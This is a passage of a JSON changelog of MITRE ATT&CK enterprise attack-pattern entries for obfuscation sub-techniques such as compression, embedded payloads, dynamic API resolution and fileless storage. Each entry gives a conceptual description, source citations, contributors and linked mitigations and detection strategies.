+                            "source_name": "Akamai JS",
+                            "description": "Katz, O. (2020, October 26). Catch Me if You Can\u2014JavaScript Obfuscation. Retrieved March 17, 2023.",
+                            "url": "https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation"
+                        },
+                        {
+                            "source_name": "Bashfuscator Command Obfuscators",
+                            "description": "LeFevre, A. (n.d.). Bashfuscator Command Obfuscators. Retrieved March 17, 2023.",
+                            "url": "https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html"
+                        },
+                        {
+                            "source_name": "Microsoft PowerShellB64",
+                            "description": "Microsoft. (2023, February 8). about_PowerShell_exe: EncodedCommand. Retrieved March 17, 2023.",
+                            "url": "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand"
+                        },
+                        {
+                            "source_name": "RC PowerShell",
+                            "description": "Red Canary. (n.d.). 2022 Threat Detection Report: PowerShell. Retrieved March 17, 2023.",
+                            "url": "https://redcanary.com/threat-detection-report/techniques/powershell/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "George Thomas",
+                        "Tim Peck",
+                        "TruKno"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.718000+00:00\", \"old_value\": \"2026-04-15 22:16:39.249000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0505: Detection Strategy for Command Obfuscation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-16 15:30:57.711000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "Compile After Delivery",
+                    "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/004",
+                            "external_id": "T1027.004"
+                        },
+                        {
+                            "source_name": "ClearSky MuddyWater Nov 2018",
+                            "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
+                            "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf"
+                        },
+                        {
+                            "source_name": "ATTACK IQ",
+                            "description": "Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske. (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land Binaries. Retrieved July 15, 2024.",
+                            "url": "https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/"
+                        },
+                        {
+                            "source_name": "TrendMicro WindowsAppMac",
+                            "description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Liran Ravich, CardinalOps",
+                        "Praetorian",
+                        "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2026-04-15 22:16:52.765000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0501: Detection Strategy for Compile After Delivery - Source Code to Executable Transformation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fbd91bfc-75c2-4f0c-8116-3b4e722906b3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-04 18:29:33.850000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Compression",
+                    "description": "Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., [Fileless Storage](https://attack.mitre.org/techniques/T1027/011)).(Citation: Trustwave Pillowmint June 2020)\n\nIn order to further evade detection, adversaries may combine multiple ZIP files into one archive. This process of concatenation creates an archive that appears to be a single archive but in fact contains the central directories of the embedded archives. Some ZIP readers, such as 7zip, may not be able to identify concatenated ZIP files and miss the presence of the malicious payload.(Citation: Perception Point)\n\nFile archives may be sent as one [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) through email. Adversaries have sent malicious payloads as archived files to encourage the user to interact with and extract the malicious payload onto their system (i.e., [Malicious File](https://attack.mitre.org/techniques/T1204/002)).(Citation: NTT Security Flagpro new December 2021) However, some file compression tools, such as 7zip, can be used to produce self-extracting archives. Adversaries may send self-extracting archives to hide the functionality of their payload and launch it without requiring multiple actions from the user.(Citation: The Hacker News)\n\n[Compression](https://attack.mitre.org/techniques/T1027/015) may be used in combination with [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013) where compressed files are encrypted and password-protected.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/015",
+                            "external_id": "T1027.015"
+                        },
+                        {
+                            "source_name": "Perception Point",
+                            "description": "Arthur Vaiselbuh, Peleg Cabra. (2024, November 7). Evasive ZIP Concatenation: Trojan Targets Windows Users. Retrieved March 3, 2025.",
+                            "url": "https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/"
+                        },
+                        {
+                            "source_name": "NTT Security Flagpro new December 2021",
+                            "description": "Hada, H. (2021, December 28).  Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.",
+                            "url": "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech"
+                        },
+                        {
+                            "source_name": "The Hacker News",
+                            "description": "Ravie Lakshmanan. (2023, April 5). Hackers Using Self-Extracting Archives Exploit for Stealthy Backdoor Attacks. Retrieved March 3, 2025.",
+                            "url": "https://thehackernews.com/2023/04/hackers-using-self-extracting-archives.html"
+                        },
+                        {
+                            "source_name": "Trustwave Pillowmint June 2020",
+                            "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020.",
+                            "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Fernando Bacchin"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-15 22:16:53.338000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0281: Detection Strategy for Compressed Payload Creation and Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-08-22 20:42:08.498000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Dynamic API Resolution",
+                    "description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\n\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)\n\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\n\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/007",
+                            "external_id": "T1027.007"
+                        },
+                        {
+                            "source_name": "Huntress API Hash",
+                            "description": "Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.",
+                            "url": "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection"
+                        },
+                        {
+                            "source_name": "BlackHat API Packers",
+                            "description": "Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.",
+                            "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf"
+                        },
+                        {
+                            "source_name": "Drakonia HInvoke",
+                            "description": "drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved August 22, 2022.",
+                            "url": "https://dr4k0nia.github.io/posts/HInvoke-and-avoiding-PInvoke/"
+                        },
+                        {
+                            "source_name": "IRED API Hashing",
+                            "description": "spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved August 22, 2022.",
+                            "url": "https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:17:50.411000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0091: Detection Strategy for Dynamic API Resolution via Hash-Based Function Lookups"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-09-30 18:50:14.351000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Embedded Payloads",
+                    "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/009",
+                            "external_id": "T1027.009"
+                        },
+                        {
+                            "source_name": "GitHub PSImage",
+                            "description": "Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022.",
+                            "url": "https://github.com/peewpw/Invoke-PSImage"
+                        },
+                        {
+                            "source_name": "Malware Analysis Report ComRAT",
+                            "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 \u2013 PowerShell Script: ComRAT. Retrieved September 30, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a"
+                        },
+                        {
+                            "source_name": "Trend Micro",
+                            "description": "Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.",
+                            "url": "https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html"
+                        },
+                        {
+                            "source_name": "Securelist Dtrack2",
+                            "description": "KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.",
+                            "url": "https://securelist.com/my-name-is-dtrack/93338/"
+                        },
+                        {
+                            "source_name": "Microsoft Learn",
+                            "description": "Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.",
+                            "url": "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1"
+                        },
+                        {
+                            "source_name": "SentinelLabs reversing run-only applescripts 2021",
+                            "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.",
+                            "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"
+                        },
+                        {
+                            "source_name": "Sentinel Labs",
+                            "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.",
+                            "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Nick Cairns, @grotezinfosec"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-15 22:18:17.938000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0214: Detection Strategy for Embedded Payloads"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-29 12:38:17.135000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Encrypted/Encoded File",
+                    "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/013",
+                            "external_id": "T1027.013"
+                        },
+                        {
+                            "source_name": "File obfuscation",
+                            "description": "Aspen Lindblom, Joseph Goodwin, and Chris Sheldon. (2021, July 19). Shlayer Malvertising Campaigns Still Using Flash Update Disguise. Retrieved March 29, 2024.",
+                            "url": "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/"
+                        },
+                        {
+                            "source_name": "SFX - Encrypted/Encoded File",
+                            "description": "Jai Minton. (2023, March 31). How Falcon OverWatch Investigates Malicious Self-Extracting Archives, Decoy Files and Their Hidden Payloads. Retrieved March 29, 2024.",
+                            "url": "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Andrew Northern, @ex_raritas",
+                        "David Galazin @themalwareman1",
+                        "Jai Minton, @Cyberraiju"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-15 22:18:22.179000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0087: Encrypted or Encoded File Payload Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-23 19:55:25.546000+00:00",
+                    "modified": "2026-05-12 15:12:00.619000+00:00",
+                    "name": "Fileless Storage",
+                    "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by antivirus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/011",
+                            "external_id": "T1027.011"
+                        },
+                        {
+                            "source_name": "Aquasec Muhstik Malware 2024",
+                            "description": " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message Queuing Services Applications. Retrieved September 24, 2024.",
+                            "url": "https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/"
+                        },
+                        {
+                            "source_name": "Bitsight 7777 Botnet",
+                            "description": "Batista, Jo\u00e3o.  Gi7w0rm. (2024, August 27). Retrieved June 5, 2025.",
+                            "url": "https://www.bitsight.com/blog/7777-botnet-insights-multi-target-botnet"
+                        },
+                        {
+                            "source_name": "CISCO Nexus 900 Config",
+                            "description": "CISCO. (2021, September 14). Cisco Nexus 9000 Series NX-OS Fundamentals Configuration Guide, Release 7.x. Retrieved June 5, 2025.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus9000/sw/7-x/fundamentals/configuration/guide/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x_chapter_01000.html"
+                        },
+                        {
+                            "source_name": "Elastic Binary Executed from Shared Memory Directory",
+                            "description": "Elastic. (n.d.). Binary Executed from Shared Memory Directory. Retrieved September 24, 2024.",
+                            "url": "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html"
+                        },
+                        {
+                            "source_name": "SecureList Fileless",
+                            "description": "Legezo, D. (2022, May 4). A new secret stash for \u201cfileless\u201d malware. Retrieved March 23, 2023.",
+                            "url": "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/"
+                        },
+                        {
+                            "source_name": "Microsoft Fileless",
+                            "description": "Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023.",
+                            "url": "https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats"
+                        },
+                        {
+                            "source_name": "Sysdig Fileless Malware 23022",
+                            "description": "Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved September 24, 2024.",
+                            "url": "https://sysdig.com/blog/containers-read-only-fileless-malware/"
+                        },
+                        {
+                            "source_name": "Akami Frog4Shell 2024",
+                            "description": "Ori David. (2024, February 1). Frog4Shell \u2014 FritzFrog Botnet Adds One-Days to Its Arsenal. Retrieved September 24, 2024.",
+                            "url": "https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Christopher Peacock",
+                        "Denise Tan",
+                        "Mark Wee",
+                        "Simona David",
+                        "Vito Alfano, Group-IB",
+                        "Xavier Rousseau"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
